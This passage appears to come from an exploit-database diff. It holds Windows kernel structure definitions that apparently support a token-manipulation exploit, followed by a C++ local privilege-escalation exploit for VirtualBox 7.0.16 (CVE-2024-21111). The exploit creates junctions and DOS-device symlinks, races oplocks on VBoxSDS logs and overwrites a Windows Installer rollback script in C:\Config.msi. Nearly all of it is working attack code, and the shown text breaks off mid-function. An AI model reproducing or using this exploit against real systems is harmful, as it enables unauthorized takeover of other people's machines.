+    struct _LIST_ENTRY ApcListEntry; //0x10
+    VOID* Reserved[3]; //0x20
+    VOID* NormalContext; //0x38
+    VOID* SystemArgument1; //0x40
+    VOID* SystemArgument2; //0x48
+    CHAR ApcStateIndex; //0x50
+    CHAR ApcMode; //0x51
+    UCHAR Inserted; //0x52
+};
+//0xd0 bytes (sizeof)
+struct _IRP
+{
+    SHORT Type; //0x0
+    USHORT Size; //0x2
+    USHORT AllocationProcessorNumber; //0x4
+    USHORT Reserved; //0x6
+    struct _MDL* MdlAddress; //0x8
+    ULONG Flags; //0x10
+    union
+    {
+        struct _IRP* MasterIrp; //0x18
+        LONG IrpCount; //0x18
+        VOID* SystemBuffer; //0x18
+    } AssociatedIrp; //0x18
+    struct _LIST_ENTRY ThreadListEntry; //0x20
+    struct IO_STATUS_BLOCK IoStatus; //0x30
+    CHAR RequestorMode; //0x40
+    UCHAR PendingReturned; //0x41
+    CHAR StackCount; //0x42
+    CHAR CurrentLocation; //0x43
+    UCHAR Cancel; //0x44
+    UCHAR CancelIrql; //0x45
+    CHAR ApcEnvironment; //0x46
+    UCHAR AllocationFlags; //0x47
+    union
+    {
+        struct _IO_STATUS_BLOCK* UserIosb; //0x48
+        VOID* IoRingContext; //0x48
+    };
+    struct _KEVENT* UserEvent; //0x50
+    union
+    {
+        struct
+        {
+            union
+            {
+                VOID(*UserApcRoutine)(VOID* arg1, struct _IO_STATUS_BLOCK*
+arg2, ULONG arg3); //0x58
+                VOID* IssuingProcess; //0x58
+            };
+            union
+            {
+                VOID* UserApcContext; //0x60
+                struct _IORING_OBJECT* IoRing; //0x60
+            };
+        } AsynchronousParameters; //0x58
+        union _LARGE_INTEGER AllocationSize; //0x58
+    } Overlay; //0x58
+    VOID(*CancelRoutine)(struct _DEVICE_OBJECT* arg1, struct _IRP* arg2);
+//0x68
+    VOID* UserBuffer; //0x70
+    union
+    {
+        struct
+        {
+            union
+            {
+                struct _KDEVICE_QUEUE_ENTRY DeviceQueueEntry; //0x78
+                VOID* DriverContext[4]; //0x78
+            };
+            struct _ETHREAD* Thread; //0x98
+            CHAR* AuxiliaryBuffer; //0xa0
+            struct _LIST_ENTRY ListEntry; //0xa8
+            union
+            {
+                struct _IO_STACK_LOCATION* CurrentStackLocation; //0xb8
+                ULONG PacketType; //0xb8
+            };
+            struct _FILE_OBJECT* OriginalFileObject; //0xc0
+            VOID* IrpExtension; //0xc8
+        } Overlay; //0x78
+        struct _KAPC Apc; //0x78
+        VOID* CompletionKey; //0x78
+    } Tail; //0x78
+};
+typedef struct _TA_ADDRESS
+{
+    USHORT AddressLength;
+    USHORT AddressType;
+    UCHAR Address[1];
+}TA_ADDRESS;
+
+typedef struct _TRANSPORT_ADDRESS
+{
+    LONG TAAddressCount;
+    TA_ADDRESS Address[1];
+}TRANSPORT_ADDRESS;
+
+typedef struct _UNICODE_STRING {
+    USHORT Length;
+    USHORT MaximumLength;
+    PWSTR Buffer;
+} UNICODE_STRING, * PUNICODE_STRING;
+
+typedef struct _OBJECT_ATTRIBUTES
+{
+    ULONG Length;
+    HANDLE RootDirectory;
+    PUNICODE_STRING ObjectName;
+    ULONG Attributes;
+    PVOID SecurityDescriptor;
+    PVOID SecurityQualityOfService;
+}OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;
+
+typedef struct _SYSTEM_MODULE_ENTRY
+{
+    HANDLE Section;
+    PVOID MappedBase;
+    PVOID ImageBase;
+    ULONG ImageSize;
+    ULONG Flags;
+    USHORT LoadOrderIndex;
+    USHORT InitOrderIndex;
+    USHORT LoadCount;
+    USHORT OffsetToFileName;
+    UCHAR FullPathName[256];
+} SYSTEM_MODULE_ENTRY, * PSYSTEM_MODULE_ENTRY;
+
+typedef struct _SYSTEM_MODULE_INFORMATION
+{
+    ULONG Count;
+    SYSTEM_MODULE_ENTRY Module[1];
+} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;
+
+typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX
+{
+    PVOID Object;
+    ULONG_PTR UniqueProcessId;
+    ULONG_PTR HandleValue;
+    ULONG GrantedAccess;
+    USHORT CreatorBackTraceIndex;
+    USHORT ObjectTypeIndex;
+    ULONG HandleAttributes;
+    ULONG Reserved;
+} SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO_EX;
+
+typedef struct _SYSTEM_HANDLE_INFORMATION_EX
+{
+    ULONG_PTR NumberOfHandles;
+    ULONG_PTR Reserved;
+    SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX Handles[1];
+} SYSTEM_HANDLE_INFORMATION_EX, * PSYSTEM_HANDLE_INFORMATION_EX;
+
+typedef struct _AFD_CREATE_PACKET {
+    //FILE_FULL_EA_INFORMATION
+    ULONG NextEntryOffset;
+    WORD Flags;
+    UCHAR EaNameLength;
+    USHORT EaValueLength;
+    CHAR EaName[15];
+
+    //AFD_CREATE_PACKET
+    ULONG EndpointFlags;
+    ULONG GroupID;
+    ULONG AddressFamily;
+    ULONG SocketType;
+    ULONG Protocol;
+    ULONG SizeOfTransportName;
+    wchar_t TransportName[16];
+    //UCHAR Unkown;
+} AFD_CREATE_PACKET;
+
+enum THREADINFOCLASS { ThreadImpersonationToken = 5 };
+
+enum SYSTEM_INFORMATION_CLASS {
+    SystemModuleInformation = 11,
+    SystemExtendedHandleInformation = 64
+};
+
+typedef enum EVENT_TYPE {
+    NotificationEvent,
+    SynchronizationEvent
+};
+
+typedef struct _AFD_BIND_DATA {
+    ULONG ShareType;
+    SOCKADDR_IN addr;
+} AFD_BIND_DATA, * PAFD_BIND_DATA;
+
+typedef struct alignas(16) MY_AFD_CONNECT_INFO
+{
+    __int64 UseSan;
+    __int64 hNtSock1;
+    __int64 Unknown;
+    __int32 tmp6;
+    WORD const_16;
+    sockaddr_in bind;
+};
+
+
+typedef struct FAKE_DATA_ENTRY_QUEUE
+{
+    DWORD tmp;
+    LIST_ENTRY nextQueue;
+    __int64 unknown;
+    PVOID security_client_context;
+    __int64 unknown2;
+    __int64 sizeOfData;
+    char DATA[0x77FD0];
+};
+
+typedef struct _AFD_LISTEN_INFO {
+
+    ULONG unknown;
+    __int64 MaximumConnectionQueue;
+} AFD_LISTEN_INFO, * PAFD_LISTEN_INFO;
+
+
+
+
+
+
+typedef struct _SECURITY_CLIENT_CONTEXT
+{
+    _SECURITY_QUALITY_OF_SERVICE SecurityQos;
+    void* ClientToken;
+    unsigned __int8 DirectlyAccessClientToken;
+    unsigned __int8 DirectAccessEffectiveOnly;
+    unsigned __int8 ServerIsRemote;
+    _TOKEN_CONTROL ClientTokenControl;
+}SECURITY_CLIENT_CONTEXT, * PSECURITY_CLIENT_CONTEXT;
+
+struct __declspec(align(8)) _OWNER_ENTRY
+{
+    unsigned __int64 OwnerThread;
+    DWORD ___u1;
+};
+
+
+//0x68 bytes (sizeof)
+typedef struct _ERESOURCE
+{
+    struct _LIST_ENTRY SystemResourcesList; //0x0
+    struct _OWNER_ENTRY* OwnerTable; //0x10
+    SHORT ActiveCount; //0x18
+    union
+    {
+        USHORT Flag; //0x1a
+        struct
+        {
+            UCHAR ReservedLowFlags; //0x1a
+            UCHAR WaiterPriority; //0x1b
+        };
+    };
+    VOID* SharedWaiters; //0x20
+    VOID* ExclusiveWaiters; //0x28
+    struct _OWNER_ENTRY OwnerEntry; //0x30
+    ULONG ActiveEntries; //0x40
+    ULONG ContentionCount; //0x44
+    ULONG NumberOfSharedWaiters; //0x48
+    ULONG NumberOfExclusiveWaiters; //0x4c
+    VOID* Reserved2; //0x50
+    union
+    {
+        VOID* Address; //0x58
+        ULONGLONG CreatorBackTraceIndex; //0x58
+    };
+    ULONGLONG SpinLock; //0x60
+}ERESOURCE, *PERESOURCE;
+
+//0x8 bytes (sizeof)
+typedef struct _EX_PUSH_LOCK
+{
+    union
+    {
+        struct
+        {
+            ULONGLONG Locked : 1; //0x0
+            ULONGLONG Waiting : 1; //0x0
+            ULONGLONG Waking : 1; //0x0
+            ULONGLONG MultipleShared : 1; //0x0
+            ULONGLONG Shared : 60; //0x0
+        };
+        ULONGLONG Value; //0x0
+        VOID* Ptr; //0x0
+    };
+};
+
+//0x10 bytes (sizeof)
+typedef struct _SEP_CACHED_HANDLES_TABLE
+{
+    struct _EX_PUSH_LOCK Lock; //0x0
+    struct _RTL_DYNAMIC_HASH_TABLE* HashTable; //0x8
+};
+
+//0x8 bytes (sizeof)
+typedef struct _EX_RUNDOWN_REF
+{
+    union
+    {
+        ULONGLONG Count; //0x0
+        VOID* Ptr; //0x0
+    };
+};
+
+//0x20 bytes (sizeof)
+typedef struct _OB_HANDLE_REVOCATION_BLOCK
+{
+    struct _LIST_ENTRY RevocationInfos; //0x0
+    struct _EX_PUSH_LOCK Lock; //0x10
+    struct _EX_RUNDOWN_REF Rundown; //0x18
+};
+
+//0xc0 bytes (sizeof)
+typedef struct _SEP_LOGON_SESSION_REFERENCES
+{
+    struct _SEP_LOGON_SESSION_REFERENCES* Next; //0x0
+    struct _LUID LogonId; //0x8
+    struct _LUID BuddyLogonId; //0x10
+    LONGLONG ReferenceCount; //0x18
+    ULONG Flags; //0x20
+    struct _DEVICE_MAP* pDeviceMap; //0x28
+    VOID* Token; //0x30
+    struct _UNICODE_STRING AccountName; //0x38
+    struct _UNICODE_STRING AuthorityName; //0x48
+    struct _SEP_CACHED_HANDLES_TABLE CachedHandlesTable; //0x58
+    struct _EX_PUSH_LOCK SharedDataLock; //0x68
+    struct _AUTHZBASEP_CLAIM_ATTRIBUTES_COLLECTION* SharedClaimAttributes;
+//0x70
+    struct _SEP_SID_VALUES_BLOCK* SharedSidValues; //0x78
+    struct _OB_HANDLE_REVOCATION_BLOCK RevocationBlock; //0x80
+    struct _EJOB* ServerSilo; //0xa0
+    struct _LUID SiblingAuthId; //0xa8
+    struct _LIST_ENTRY TokenList; //0xb0
+};
+//0x30 bytes (sizeof)
+typedef struct _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION
+{
+    ULONG SecurityAttributeCount; //0x0
+    struct _LIST_ENTRY SecurityAttributesList; //0x8
+    ULONG WorkingSecurityAttributeCount; //0x18
+    struct _LIST_ENTRY WorkingSecurityAttributesList; //0x20
+}AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION;
+
+//0x20 bytes (sizeof)
+typedef struct _SEP_SID_VALUES_BLOCK
+{
+    ULONG BlockLength; //0x0
+    LONGLONG ReferenceCount; //0x8
+    ULONG SidCount; //0x10
+    ULONGLONG SidValuesStart; //0x18
+}SEP_SID_VALUES_BLOCK,*PSEP_SID_VALUES_BLOCK;
+
+//0x18 bytes (sizeof)
+struct _SEP_TOKEN_PRIVILEGES
+{
+    ULONGLONG Present; //0x0
+    ULONGLONG Enabled; //0x8
+    ULONGLONG EnabledByDefault; //0x10
+};
+
+//0x1f bytes (sizeof)
+struct _SEP_AUDIT_POLICY
+{
+    struct _TOKEN_AUDIT_POLICY AdtTokenPolicy; //0x0
+    UCHAR PolicySetStatus; //0x1e
+};
+
+//0x498 bytes (sizeof)
+struct _TOKEN
+{
+    struct _TOKEN_SOURCE TokenSource; //0x0
+    struct _LUID TokenId; //0x10
+    struct _LUID AuthenticationId; //0x18
+    struct _LUID ParentTokenId; //0x20
+    union _LARGE_INTEGER ExpirationTime; //0x28
+    struct _ERESOURCE* TokenLock; //0x30
+    struct _LUID ModifiedId; //0x38
+    struct _SEP_TOKEN_PRIVILEGES Privileges; //0x40
+    struct _SEP_AUDIT_POLICY AuditPolicy; //0x58
+    ULONG SessionId; //0x78
+    ULONG UserAndGroupCount; //0x7c
+    ULONG RestrictedSidCount; //0x80
+    ULONG VariableLength; //0x84
+    ULONG DynamicCharged; //0x88
+    ULONG DynamicAvailable; //0x8c
+    ULONG DefaultOwnerIndex; //0x90
+    struct _SID_AND_ATTRIBUTES* UserAndGroups; //0x98
+    struct _SID_AND_ATTRIBUTES* RestrictedSids; //0xa0
+    VOID* PrimaryGroup; //0xa8
+    ULONG* DynamicPart; //0xb0
+    struct _ACL* DefaultDacl; //0xb8
+    enum _TOKEN_TYPE TokenType; //0xc0
+    enum _SECURITY_IMPERSONATION_LEVEL ImpersonationLevel; //0xc4
+    ULONG TokenFlags; //0xc8
+    UCHAR TokenInUse; //0xcc
+    ULONG IntegrityLevelIndex; //0xd0
+    ULONG MandatoryPolicy; //0xd4
+    void* LogonSession; //0xd8
+    struct _LUID OriginatingLogonSession; //0xe0
+    struct _SID_AND_ATTRIBUTES_HASH SidHash; //0xe8
+    struct _SID_AND_ATTRIBUTES_HASH RestrictedSidHash; //0x1f8
+    struct _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION*
+pSecurityAttributes; //0x308
+    VOID* Package; //0x310
+    struct _SID_AND_ATTRIBUTES* Capabilities; //0x318
+    ULONG CapabilityCount; //0x320
+    struct _SID_AND_ATTRIBUTES_HASH CapabilitiesHash; //0x328
+    struct _SEP_LOWBOX_NUMBER_ENTRY* LowboxNumberEntry; //0x438
+    struct _SEP_CACHED_HANDLES_ENTRY* LowboxHandlesEntry; //0x440
+    struct _AUTHZBASEP_CLAIM_ATTRIBUTES_COLLECTION* pClaimAttributes;
+//0x448
+    VOID* TrustLevelSid; //0x450
+    struct _TOKEN* TrustLinkedToken; //0x458
+    VOID* IntegrityLevelSidValue; //0x460
+    struct _SEP_SID_VALUES_BLOCK* TokenSidValues; //0x468
+    struct _SEP_LUID_TO_INDEX_MAP_ENTRY* IndexEntry; //0x470
+    struct _SEP_TOKEN_DIAG_TRACK_ENTRY* DiagnosticInfo; //0x478
+    struct _SEP_CACHED_HANDLES_ENTRY* BnoIsolationHandlesEntry; //0x480
+    VOID* SessionObject; //0x488
+    ULONGLONG VariablePart; //0x490
+};
+
+//0x38 bytes (sizeof)
+struct _OBJECT_HEADER
+{
+    LONGLONG PointerCount; //0x0
+    union
+    {
+        LONGLONG HandleCount; //0x8
+        VOID* NextToFree; //0x8
+    };
+    struct _EX_PUSH_LOCK Lock; //0x10
+    UCHAR TypeIndex; //0x18
+    union
+    {
+        UCHAR TraceFlags; //0x19
+        struct
+        {
+            UCHAR DbgRefTrace : 1; //0x19
+            UCHAR DbgTracePermanent : 1; //0x19
+        };
+    };
+    UCHAR InfoMask; //0x1a
+    union
+    {
+        UCHAR Flags; //0x1b
+        struct
+        {
+            UCHAR NewObject : 1; //0x1b
+            UCHAR KernelObject : 1; //0x1b
+            UCHAR KernelOnlyAccess : 1; //0x1b
+            UCHAR ExclusiveObject : 1; //0x1b
+            UCHAR PermanentObject : 1; //0x1b
+            UCHAR DefaultSecurityQuota : 1; //0x1b
+            UCHAR SingleHandleEntry : 1; //0x1b
+            UCHAR DeletedInline : 1; //0x1b
+        };
+    };
+    ULONG Reserved; //0x1c
+    union
+    {
+        struct _OBJECT_CREATE_INFORMATION* ObjectCreateInfo; //0x20
+        VOID* QuotaBlockCharged; //0x20
+    };
+    VOID* SecurityDescriptor; //0x28
+    struct _TOKEN Body; //0x30
+};
+
+struct mm {
+    void* fake_data_entry;
+    void* input;
+    _IRP* crafted_irp;
+    IO_STACK_LOCATION *crafted_arbitrary_io_stack_location;
+    void* p_mem_0x30;
+    void* p_mem_0xD0_2;
+    _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION* pSecurityAttributes;
+    ACL* VariablePartDefaultDacl;
+    ACL* VariablePartDefaultDacl2;
+    _ERESOURCE* TokenLock;
+    void* PrimaryGroup;
+    int sizeOfClientTokenAndObjectHeader;
+    PSEP_SID_VALUES_BLOCK TokenSidValues;
+    _SECURITY_CLIENT_CONTEXT* security_client_context;
+    _SEP_LOGON_SESSION_REFERENCES* LogonSession;
+    _TOKEN* fakeToken;
+    void *pipe_100_im_control_block;
+    void* pipe_100_rw_control_block;
+    void* p_mem_Pipe_hToPipe_1000_rw;
+    void* p_mem_Pipe_hToPipe_1000_rw_2;
+    HANDLE hPipeIM;
+    HANDLE hPipeRW;
+    HANDLE hFileIM;
+    HANDLE hFileRW;
+    HANDLE IncPrimitiveTOKEN;
+    HANDLE RWPrimitiveTOKEN;
+};
+
+//0x18 bytes (sizeof)
+struct _DISPATCHER_HEADER
+{
+    union
+    {
+        volatile LONG Lock; //0x0
+        LONG LockNV; //0x0
+        struct
+        {
+            UCHAR Type; //0x0
+            UCHAR Signalling; //0x1
+            UCHAR Size; //0x2
+            UCHAR Reserved1; //0x3
+        };
+        struct
+        {
+            UCHAR TimerType; //0x0
+            union
+            {
+                UCHAR TimerControlFlags; //0x1
+                struct
+                {
+                    UCHAR Absolute : 1;

exploits/windows/local/52287.C++

@@ -0,0 +1,499 @@
+# Exploit Title: VirtualBox 7.0.16 - Privilege Escalation
+# Date: 2025-05-06
+# Exploit Author: Milad Karimi (Ex3ptionaL)
+# Contact: miladgrayhat@gmail.com
+# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
+# Tested on: Win x64
+# CVE : CVE-2024-21111
+
+
+#include <Windows.h>
+#include <Shlwapi.h>
+#include <WtsApi32.h>
+#include <Msi.h>
+#include <PathCch.h>
+#include <AclAPI.h>
+#include <iostream>
+#include "resource.h"
+#include "def.h"
+#include "FileOplock.h"
+#pragma comment(lib, "Msi.lib")
+#pragma comment(lib, "Shlwapi.lib")
+#pragma comment(lib, "wtsapi32")
+#pragma comment(lib, "PathCch.lib")
+#pragma comment(lib, "rpcrt4.lib")
+#pragma warning(disable:4996)
+struct __declspec(uuid("74AB5FFE-8726-4435-AA7E-876D705BCBA5"))
+CLSID_VBoxSDS;
+FileOpLock* oplock;
+HANDLE hFile, vb11, h;
+HANDLE hthread;
+NTSTATUS retcode;
+HMODULE hm = GetModuleHandle(NULL);
+HRSRC res = FindResource(hm, MAKEINTRESOURCE(IDR_RBS1), L"rbs");
+DWORD RbsSize = SizeofResource(hm, res);
+void* RbsBuff = LoadResource(hm, res);
+WCHAR dir[MAX_PATH] = { 0x0 };
+wchar_t filen[MAX_PATH] = { 0x0 };
+DWORD WINAPI install(void*);
+BOOL Move(HANDLE hFile);
+void callback();
+HANDLE getDirectoryHandle(LPWSTR file, DWORD access, DWORD share, DWORD
+dispostion);
+LPWSTR BuildPath(LPCWSTR path);
+void loadapis();
+VOID cb1();
+VOID cb0();
+BOOL Monitor(HANDLE hDir);
+BOOL clearDataDir();
+BOOL CreateJunction(LPCWSTR dir, LPCWSTR target) {
+ HANDLE hJunction;
+ DWORD cb;
+ wchar_t printname[] = L"";
+ HANDLE hDir;
+ hDir = CreateFile(dir, FILE_WRITE_ATTRIBUTES, FILE_SHARE_READ, NULL,
+OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS, NULL);
+ if (hDir == INVALID_HANDLE_VALUE) {
+  printf("[!] Failed to obtain handle on directory %ls.\n", dir);
+  return FALSE;
+ }
+ SIZE_T TargetLen = wcslen(target) * sizeof(WCHAR);
+ SIZE_T PrintnameLen = wcslen(printname) * sizeof(WCHAR);
+ SIZE_T PathLen = TargetLen + PrintnameLen + 12;
+ SIZE_T Totalsize = PathLen + (DWORD)(FIELD_OFFSET(REPARSE_DATA_BUFFER,
+GenericReparseBuffer.DataBuffer));
+ PREPARSE_DATA_BUFFER Data = (PREPARSE_DATA_BUFFER)malloc(Totalsize);
+ Data->ReparseTag = IO_REPARSE_TAG_MOUNT_POINT;
+ Data->ReparseDataLength = PathLen;
+ Data->Reserved = 0;
+ Data->MountPointReparseBuffer.SubstituteNameOffset = 0;
+ Data->MountPointReparseBuffer.SubstituteNameLength = TargetLen;
+ memcpy(Data->MountPointReparseBuffer.PathBuffer, target, TargetLen + 2);
+ Data->MountPointReparseBuffer.PrintNameOffset = (USHORT)(TargetLen + 2);
+ Data->MountPointReparseBuffer.PrintNameLength = (USHORT)PrintnameLen;
+ memcpy(Data->MountPointReparseBuffer.PathBuffer + wcslen(target) + 1,
+printname, PrintnameLen + 2);
+ if (DeviceIoControl(hDir, FSCTL_SET_REPARSE_POINT, Data, Totalsize, NULL,
+0, &cb, NULL) != 0)
+ {
+  printf("[+] Junction %ls -> %ls created!\n", dir, target);
+  free(Data);
+  return TRUE;
+ }
+ else
+ {
+  printf("[!] Error: %d. Exiting\n", GetLastError());
+  free(Data);
+  return FALSE;
+ }
+}
+BOOL DeleteJunction(LPCWSTR path) {
+ REPARSE_GUID_DATA_BUFFER buffer = { 0 };
+ BOOL ret;
+ buffer.ReparseTag = IO_REPARSE_TAG_MOUNT_POINT;
+ DWORD cb = 0;
+ IO_STATUS_BLOCK io;
+ HANDLE hDir;
+ hDir = CreateFile(path, FILE_WRITE_ATTRIBUTES, FILE_SHARE_READ, NULL,
+OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS | FILE_OPEN_REPARSE_POINT, NULL);
+ if (hDir == INVALID_HANDLE_VALUE) {
+  printf("[!] Failed to obtain handle on directory %ls.\n", path);
+  printf("%d\n", GetLastError());
+  return FALSE;
+ }
+ ret = DeviceIoControl(hDir, FSCTL_DELETE_REPARSE_POINT, &buffer,
+REPARSE_GUID_DATA_BUFFER_HEADER_SIZE, NULL, NULL, &cb, NULL);
+ if (ret == 0) {
+  printf("Error: %d\n", GetLastError());
+  return FALSE;
+ }
+ else
+ {
+  printf("[+] Junction %ls delete!\n", dir);
+  return TRUE;
+ }
+}
+BOOL DosDeviceSymLink(LPCWSTR object, LPCWSTR target) {
+ if (DefineDosDevice(DDD_NO_BROADCAST_SYSTEM | DDD_RAW_TARGET_PATH, object,
+target)) {
+  printf("[+] Symlink %ls -> %ls created!\n", object, target);
+  return TRUE;
+ }
+ else
+ {
+  printf("error :%d\n", GetLastError());
+  return FALSE;
+ }
+}
+BOOL DelDosDeviceSymLink(LPCWSTR object, LPCWSTR target) {
+ if (DefineDosDevice(DDD_NO_BROADCAST_SYSTEM | DDD_RAW_TARGET_PATH |
+DDD_REMOVE_DEFINITION | DDD_EXACT_MATCH_ON_REMOVE, object, target)) {
+  printf("[+] Symlink %ls -> %ls deleted!\n", object, target);
+  return TRUE;
+ }
+ else
+ {
+  printf("error :%d\n", GetLastError());
+  return FALSE;
+ }
+}
+void runSDS(int delay) {
+ if (delay == 1) {
+  printf("[!] sleeping for 2 sec\n");
+  Sleep(2000);
+ }
+ CoInitialize(NULL);
+ LPVOID ppv;
+ // 1st trigger to create VBoxSDS.log dir
+ CoCreateInstance(__uuidof(CLSID_VBoxSDS), 0, CLSCTX_LOCAL_SERVER,
+IID_IUnknown, &ppv);
+ CoUninitialize();
+}
+BOOL checkSDSLog() {
+ BOOL clear = FALSE;
+ std::wstring vboxDataDir = L"C:\\ProgramData\\VirtualBox\\VBoxSDS.log.*";
+ HANDLE hFind;
+ WIN32_FIND_DATA data;
+ hFind = FindFirstFile(LPCWSTR(vboxDataDir.c_str()), &data);
+ // iterate first VBoxSDS.log
+ FindNextFile(hFind, &data);
+ if (hFind != INVALID_HANDLE_VALUE) {
+  do {
+   if (wcswcs(data.cFileName, L"VBoxSDS.log.")) {
+    runSDS(0);
+    //wprintf(L"%s\n", data.cFileName);
+   }
+   else {
+    printf("[+] Logs have been cleared!\n");
+    clear = TRUE;
+   }
+   //wprintf(L"%s\n", data.cFileName);
+  } while (FindNextFile(hFind, &data));
+  FindClose(hFind);
+ }
+ //printf("CLEAR: %d\n", clear);
+ return clear;
+}
+BOOL enumProc(const wchar_t* procName) {
+ PWTS_PROCESS_INFO processes{};
+ BOOL ok = FALSE;
+ DWORD count;
+ if (WTSEnumerateProcesses(WTS_CURRENT_SERVER_HANDLE, NULL, 1, &processes,
+&count)) {
+  for (DWORD i = 0; i < count; i++) {
+   if (wcswcs(processes[i].pProcessName, procName)) {
+    wprintf(L"[!] Process active: %s with PID %d\n",
+processes[i].pProcessName, processes[i].ProcessId);
+    ok = TRUE;
+    break;
+   }
+  }
+ }
+ else {
+  printf("err: %d\n", GetLastError());
+ }
+ WTSFreeMemory(processes);
+ return ok;
+}
+void checkIfExists() {
+ if (enumProc(L"VirtualBoxVM.exe")) {
+  printf("[!] You seem to have active VMs running, please stop them before
+running this to prevent corruption of any saved data of the VMs.\n");
+  exit(1);
+ }
+ if (enumProc(L"VirtualBox.exe")) {
+  printf("[!] VirtualBox process active\n");
+  // message
+  printf("[!] Trying to exit virtualbox by postmessage close window\n");
+  PostMessage(FindWindow(NULL, TEXT("Oracle VM VirtualBox Manager")),
+WM_CLOSE, NULL, NULL);
+  printf("[!] Letting VBoxSDS exit (wait 12 seconds)\n\n");
+  Sleep(12000);
+  if (enumProc(L"VBoxSDS.exe")) {
+   printf("[-] error stopping vboxsds\n");
+   exit(1);
+  }
+  else {
+   printf("[+] Success stopping vboxsds!\n");
+  }
+ }
+}
+BOOL clearDataDir() {
+ do {
+  vb11 = CreateFile(L"C:\\ProgramData\\VirtualBox\\VBoxSDS.log.11", DELETE,
+FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_ALWAYS,
+FILE_FLAG_OVERLAPPED, NULL);
+  printf("h: %x %d\n", vb11, GetLastError());
+ } while (vb11 == INVALID_HANDLE_VALUE);
+ oplock = FileOpLock::CreateLock(vb11, cb1);
+ if (oplock != NULL) {
+  HANDLE c = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)runSDS, NULL, 0,
+NULL);
+  oplock->WaitForLock(INFINITE);
+  CloseHandle(c);
+ }
+ BOOL isEmpty = FALSE;
+ do {
+  isEmpty = checkSDSLog();
+ } while (isEmpty == FALSE);
+ if (!RemoveDirectory(L"C:\\ProgramData\\VirtualBox\\VBoxSDS.log")) {
+  printf("error removing vboxlog dir\n");
+  exit(1);
+ }
+ return isEmpty;
+}
+int wmain() {
+ loadapis();
+ checkIfExists();
+ clearDataDir();
+ hFile = getDirectoryHandle(BuildPath(L"C:\\Config.msi"), GENERIC_READ |
+DELETE, FILE_SHARE_READ | FILE_SHARE_WRITE, FILE_OPEN_IF);
+ if (hFile == INVALID_HANDLE_VALUE)
+ {
+  printf("[!] Failed to create C:\\Config.msi directory. Trying to delete
+it.\n");
+  install(NULL);
+  hFile = getDirectoryHandle(BuildPath(L"C:\\Config.msi"), GENERIC_READ |
+DELETE, FILE_SHARE_READ | FILE_SHARE_WRITE, FILE_OPEN_IF);
+  if (hFile != INVALID_HANDLE_VALUE)
+  {
+   printf("[+] Successfully removed and recreated C:\\Config.Msi.\n");
+  }
+  else
+  {
+   printf("[!] Failed. Cannot remove c:\\Config.msi");
+   //return 1;
+  }
+ }
+ if (!PathIsDirectoryEmpty(L"C:\\Config.Msi"))
+ {
+  printf("[!] Failed. C:\\Config.Msi already exists and is not empty.\n");
+  //return 1;
+ }
+ printf("[+] Config.msi directory created!\n");
+ HANDLE hDir =
+getDirectoryHandle(BuildPath(L"C:\\ProgramData\\VirtualBox"), GENERIC_READ,
+FILE_SHARE_READ | FILE_SHARE_WRITE, FILE_OPEN_IF);
+ printf("hDir: %x\n", hDir);
+ //Monitor(hDir);
+ HANDLE zxc{};
+ zxc = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)Monitor, hDir, 0,
+NULL);
+ SetPriorityClass(GetCurrentProcess(), HIGH_PRIORITY_CLASS);
+ SetThreadPriorityBoost(GetCurrentThread(), TRUE); // This lets us maintain
+express control of our priority
+ SetThreadPriority(GetCurrentThread(), THREAD_PRIORITY_TIME_CRITICAL);
+ oplock = FileOpLock::CreateLock(hFile, callback);
+ if (oplock != nullptr) {
+  oplock->WaitForLock(INFINITE);
+  delete oplock;
+ }
+ do {
+  hFile = getDirectoryHandle(BuildPath(L"C:\\Config.msi"), GENERIC_READ |
+WRITE_DAC | READ_CONTROL | DELETE, FILE_SHARE_READ | FILE_SHARE_WRITE |
+FILE_SHARE_DELETE, FILE_OPEN_IF);
+ } while (!hFile);
+ char buff[4096];
+ DWORD retbt = 0;
+ FILE_NOTIFY_INFORMATION* fn;
+ WCHAR* extension;
+ WCHAR* extension2;
+ do {
+  ReadDirectoryChangesW(hFile, buff, sizeof(buff) - sizeof(WCHAR), TRUE,
+FILE_NOTIFY_CHANGE_FILE_NAME,
+   &retbt, NULL, NULL);
+  fn = (FILE_NOTIFY_INFORMATION*)buff;
+  size_t sz = fn->FileNameLength / sizeof(WCHAR);
+  fn->FileName[sz] = '\0';
+  extension = fn->FileName;
+  PathCchFindExtension(extension, MAX_PATH, &extension2);
+ } while (wcscmp(extension2, L".rbs") != 0);
+ SetSecurityInfo(hFile, SE_FILE_OBJECT,
+UNPROTECTED_DACL_SECURITY_INFORMATION | DACL_SECURITY_INFORMATION, NULL,
+NULL, NULL, NULL);
+ while (!Move(hFile)) {
+ }
+ HANDLE cfg_h = getDirectoryHandle(BuildPath(L"C:\\Config.msi"),
+FILE_READ_DATA, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
+FILE_CREATE);
+ WCHAR rbsfile[MAX_PATH];
+ _swprintf(rbsfile, L"C:\\Config.msi\\%s", fn->FileName);
+ HANDLE rbs = CreateFile(rbsfile, GENERIC_WRITE, FILE_SHARE_READ |
+FILE_SHARE_WRITE | FILE_SHARE_DELETE, NULL, CREATE_ALWAYS,
+FILE_ATTRIBUTE_NORMAL, NULL);
+ if (WriteFile(rbs, RbsBuff, RbsSize, NULL, NULL)) {
+  printf("[+] Rollback script overwritten!\n");
+ }
+ else
+ {
+  printf("[!] Failed to overwrite rbs file!\n");
+ }
+ CloseHandle(rbs);
+ CloseHandle(cfg_h);
+ DeleteJunction(dir);
+ CloseHandle(zxc);
+ WCHAR asdfasdf[MAX_PATH];
+ _swprintf(asdfasdf, L"GLOBAL\\GLOBALROOT\\RPC Control\\%s", filen);
+ DelDosDeviceSymLink(asdfasdf, L"\\??\\C:\\Config.msi::$INDEX_ALLOCATION");
